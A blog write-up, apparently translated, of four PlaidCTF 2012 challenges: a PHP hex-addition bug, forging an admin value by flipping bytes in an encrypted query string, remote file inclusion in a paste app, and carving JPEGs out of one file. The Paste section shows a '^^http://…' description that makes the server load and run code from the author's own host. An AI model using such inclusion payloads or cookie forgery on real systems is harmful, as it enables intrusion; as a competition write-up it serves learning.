Friday, May 4, 2012

3P2012CTF

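Here we go again: playing it and complaining about it at the same time.
This time the thing is dressed up like an RPG.
In the end they still had to give in and put out a simple interface.


This time seems to have gone a bit better: I answered four challenges. Then again, there were quite a lot of challenges this time.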

Challenge 1
Addition is Hard
15
Puzzles
Addition is hard!
0x0 +0x7068703f = ?
Answer in decimal

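One look and you can tell they are rehashing the 2011 trivia questions again. Last time's "past paper": http://www.plaidctf.com/pctf2011/site_media/writeups/pCTF2011_Writeup_HFS.txt
Damn it, that thing isn't meant for humans to read.
Back then, asking Google about 1.3337 ~= XXXXXXX/3145727 turned up the Pentium FDIV bug.
So this time it had to be an addition bug. Asked Google again and got nothing. (Of course there are results now.)

Anyone with sharp eyes can see at a glance that 7068703f is "php?" (I think so).
So I asked Google for "php hex addition bug" and got the page below:
https://bugs.php.net/bug.php?id=61095

Turns out that when the plus sign is stuck right against the number, it becomes multiplied by two. Pretty crazy.
Answer: 3771785342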


Challenge 2

RoboDate
100
Password Guessing
So apparently robots, despite their lack of hormones, still have an underlying desire to mate. We stumbled upon a robot dating site, RoboDate. Hack it for us!

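This silly dating site lets you type in a name and a relationship status (the form is hidden, too, so out comes Firebug again).
Submit it and it shows your name and relationship status right back. Pretty pointless, isn't it?
If you look at the source code, you'll see a rather cheeky debug message.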



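It spells it out that plainly. The query string carries a long run of hex; casually changing one of its bytes changes the contents of user_data. There you go, Padding Oracle rehashed again. They were at it last year, and here we are in mid-2012, still Padding Oracle.
Strictly speaking this isn't really a Padding Oracle, because you're not going to go fiddling with the padding bytes; touch them and it just throws back "Go away." and that's that. Also, this oracle doesn't tell you whether it will rain tomorrow; it tells you what the first number of tomorrow's Mark Six draw will be, and if you change the second byte it tells you the second number. The game is all yours. Even if you don't know formulas like IV XOR M' = M, you can keep trying slowly until you finally piece together |admin.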

Answer: 2012-04-25_14:46:24.29582+05:27@2012%127.0.0.2_IS_BEST_KEY



Challenge 3

Paste
100
Practical Packets
Robot hackers, like their human counter parts, have a largely unmet need to dump large amounts of text to their peers. We recently got access to one of their servers and are providing you with the files. What have they been talking about?

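This time they even hand you the source code. Turns out it's PHP. The README says PLEASE TURN allow_url_include ON. Turning on something that damn dangerous, this has to be where it goes wrong. Digging around, I found that display_paste.php has some thing where, if the first two characters are ^^, it does require(substr($description, 2). ".txt");. Over in make_followup.php it says you need some admin cookie before you can post a description containing ^^. For whatever reason, I could post ^^ just fine without an admin cookie. So I happily posted the monster up there ^^. Typing this paragraph has left me with a pile of ^^. With the description set to a file on my own site, I could edit and run code as I pleased. First thought was to dig through the MySQL database. Turned out there was nothing (actually there was a big pile of other contestants' posts). Example: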


Array
(
    [0] => 4f9d6643584e0
    [id] => 4f9d6643584e0
    [1] => test
    [text] => test
    [2] => abap
    [language] => abap
    [3] => 4f9d6378af542
    [parent] => 4f9d6378af542
    [4] => ^^http://debugducky.com/test
    [description] => ^^http://debugducky.com/test
)

Look, I can even still reach their file:
http://debugducky.com/test.txt



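You can see they're still in there digging through information_schema.
Not finding anything, I tried dir. And there's a thing called key.php. Damn it.
fread it and there's the answer.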


Answer: s0m3_php_d3v5_actua11y_d0_th15




Challenge 4

3D
100
Potpourri
The robots appear to be testing some kind of new camera technology but we haven't quite figured it out yet. Understanding this imaging could be crucial to our understanding the enemy and winning the war.

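Mr. Luk (I don't think his surname is actually Luk, though. Not talking about you, 歐花) also had a hand in answering this one, I think.
They give you a giant JPG file. Some holographic photography nonsense. But there's only one picture, and something is covering the answer.
Really, all you need to do is explode it on the JPG header and footer (FF D8, FF D9) and it bursts into lots of pictures.
Mr. Luk says he split it by hand (?), and after pulling out the last picture he could see the answer, I think.
The picture is actually damn blurry. You need to look at several of them before you can make out the answer.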

Answer: 3d_g1v35_m3_a_h3adach3
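
The FF D8 / FF D9 split described above, as an added example that is not part of the original post: a small Python carver that pulls every start-of-image to end-of-image span out of one blob. The names carve_jpegs, fake_jpeg and SAMPLE are made up for this example, and the sample bytes are constructed, not taken from the challenge file.

```python
import sys

SOI = b"\xff\xd8"  # JPEG start-of-image marker
EOI = b"\xff\xd9"  # JPEG end-of-image marker


def carve_jpegs(blob: bytes) -> list:
    """Return every SOI..EOI span in blob, in file order.

    Assumes the images sit back to back, as the post describes. An image
    with an embedded thumbnail (nested SOI/EOI) would be cut at the
    thumbnail's EOI, so sanity-check the carved sizes.
    """
    images = []
    pos = 0
    while True:
        # SOI is always followed by another marker, so require FF D8 FF.
        start = blob.find(SOI + b"\xff", pos)
        if start < 0:
            break
        end = blob.find(EOI, start + 2)
        if end < 0:
            break  # truncated tail: no complete image left
        images.append(blob[start:end + 2])
        pos = end + 2
    return images


def fake_jpeg(payload: bytes) -> bytes:
    """Constructed stand-in for an image: SOI, one COM segment, EOI."""
    length = (len(payload) + 2).to_bytes(2, "big")
    return SOI + b"\xff\xfe" + length + payload + EOI


# Constructed sample: three "images" glued together, with junk between two.
SAMPLE = fake_jpeg(b"left") + b"\x00\x00" + fake_jpeg(b"right") + fake_jpeg(b"key")

if __name__ == "__main__":
    # With a path argument, carve that file to disk; otherwise use SAMPLE.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for i, img in enumerate(carve_jpegs(data)):
        print(f"image {i}: {len(img)} bytes")
        if len(sys.argv) > 1:
            with open(f"carved_{i:03d}.jpg", "wb") as fh:
                fh.write(img)
```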



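There was one weird challenge I couldn't answer, even though it looked pretty easy (it was worth 150 points, though).
Looking at other people's answers, they say you have to use XOR. Damn it, XOR again.

Not going to write that one up. Once you get this far in, every challenge turns into Reverse Engineering. Like playing 埃屍, where after a while every question becomes programming.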


Finally, here's a gag challenge

Shoulder Surfing
25
Puzzles
What's a password that polaroid head got from inside Ellingson?
Answer

http://www.youtube.com/watch?v=eIAQFJhuNmU&t=4m44s

Anyone with sharp eyes gets it in one viewing. Let's see how many times you need to watch it.
